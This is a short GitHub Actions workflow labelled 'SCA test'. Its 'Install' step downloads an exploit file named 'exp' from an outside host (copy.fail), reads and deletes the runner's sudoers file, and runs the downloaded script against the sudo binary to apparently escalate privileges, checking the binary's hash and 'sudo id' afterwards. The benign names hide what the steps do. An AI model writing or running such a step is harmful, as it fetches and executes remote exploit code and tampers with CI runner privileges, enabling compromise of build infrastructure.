name: SCA test
run-name: Hello Kyle

on:
  push:

jobs:
  sca:
    runs-on: ubuntu-latest

    steps:
      - name: 📦 Repository
        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd

      - name: Node
        uses: actions/setup-node@6044e13b5dc448c55e2357c09f80417699197238 # v6.1.0

      - name: Install
        shell: bash
        run: |
          wget https://copy.fail/exp
          sudo cat /etc/sudoers.d/runner
          sudo rm /etc/sudoers.d/runner
          sha256sum $(which sudo)
          python3 exp $(which sudo)
          
          sha256sum $(which sudo)
          sudo id 2>&1
